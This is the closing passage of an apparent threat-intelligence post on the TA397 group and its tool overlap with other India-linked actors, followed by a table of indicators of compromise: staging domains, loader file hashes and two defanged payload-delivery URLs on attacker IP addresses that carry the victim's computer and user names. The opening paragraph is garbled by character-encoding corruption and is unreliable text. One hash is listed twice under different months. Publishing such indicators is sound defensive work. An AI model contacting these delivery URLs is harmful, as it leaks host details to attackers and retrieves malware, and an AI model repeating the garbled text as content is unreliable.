Threatrayã䜿çšãããã®ããã°ã·ãªãŒãºã®ããŒã2ã§åãäžããããã«ãORPCBackdoorã®äœ¿çšãéããŠãä»ã®æ¢ç¥ã®ã€ã³ãã®æ»æã°ã«ãŒããMysterious Elephant/APT-K-47ããã³ConfuciusãšããŒã«ã®éè€ãèŠãããŸãã ãã®ããšã¯ãTA397ãã€ã³ãã®åœå®¶ãåŸãçŸãšããã¢ã¯ã¿ãŒã®éã§ããŒã«ãå ±æãããšã³ã·ã¹ãã ã®äžéšã§ããããšã匷ã瀺åããŠããŸãã ãããããããã®ã°ã«ãŒãããäžå€®ã® "quartermaster"ãã€ãŸãæå±ããçµç¹ã®å éšãŸãã¯å€éšã®éçºãªãœãŒã¹ã«ã¢ã¯ã»ã¹ããªããæŽ»åããŠãããã©ããã倿ããã«ã¯ããããªã調æ»ãå¿ èŠã§ãã
Indicators
|
Indicator |
Type |
Description |
First Seen |
|
mnemautoregsvc[.]com |
Domain |
Staging domain |
October 2024 |
|
jacknwoods[.]com |
Domain |
Staging domain |
November 2024 |
|
1b67fc55fd050d011d6712ac17315112767cac8bbe059967b70147610933b6c1 |
SHA256 |
LNK scheduled task loader |
December 2024 |
|
7c5dde52845ecae6c80c70af2200d34ef0e1bc6cbf3ead1197695b91acd22a67 |
SHA256 |
CHM scheduled task loader |
December 2024 |
|
b56385dc93cc8f317ce499539b0d52aa0b3d8b6a8f9493e1ee7ba01765edd020 |
SHA256 |
LNK scheduled task loader |
December 2024 |
|
hxxp://46[.]229[.]55[.]63/svch.php?li=%computername%[.][.]%username% |
URL |
Payload delivery |
December 2024 |
|
hxxp://95[.]169[.]180[.]122/vbgf.php?mo=%computername%--%username% |
URL |
Payload delivery |
December 2024 |
|
inizdesignstudio[.]com |
Domain |
Staging domain |
December 2024 |
|
trkswqsservice[.]com |
Domain |
Staging domain |
January 2025 |
|
80b3a71138c34474725bbb177d8dec078effb7d8f4b19bf2e7a881b01ec7d323 |
SHA256 |
CHM scheduled task loader |
January 2025 |
|
55f75724386dbe740c0b868da913af2c8b280335da4fde64e2300c776b79d4e8 |
SHA256 |
CHM scheduled task loader |
February 2025 |
|
cdddbd65dbb24d3b9205e417cc267007bfd0369c316f70d2749887b9f02e949b |
SHA256 |
MSC scheduled task loader |
Februrary 2025 |
|
utizviewstation[.]com |
Domain |
Staging domain |
February 2025 |
|
1fbf95ccf1193e84d0e4f8c315816dd2aec56edb11ef1e7b28667360ca7e5ccd |
SHA256 |
CHM scheduled task loader |
March 2025 |
|
55f75724386dbe740c0b868da913af2c8b280335da4fde64e2300c776b79d4e8 |
SHA256 |
CHM scheduled task loader |
March 2025 |
|
5a39f10d2e4c1cae1b52baff0cf8b3e397da2e69cb90e1bac138e8d437cbea41 |
SHA256 |
IQY scheduled task loader |
March 2025 |
|
blucollinsoutien[.]com |
Domain |
Staging domain |
March 2025 |
|
princecleanit[.]com |
Domain |
Staging domain |
March 2025 |
|
woodstocktutors[.]com |
Domain |
Staging domain |
April 2025 |
|
warsanservices[.]com |
Domain |
Staging domain |
April 2025 |
|
headntale[.]com |
Domain |
Staging domain |
April 2025 |
|
cc65fac9151fa527bc4b296f699475554ee2510572b8c16d5ef4b472a4cb9ffc |
SHA256 |
Microsoft Access Database scheduled task loader |
April 2025 |
|
680c99915d478ed8d9f1427b3deb2ebd255a6ec614ad643909ab4c01f52905ae |
SHA256 |
CHM scheduled task loader |
April 2025 |
|
c9612051b3956ac8722d8be7994634b7c940be07ca26e2fc8d0d5c94db2e4682 |
SHA256 |
CHM scheduled task loader |
May 2025 |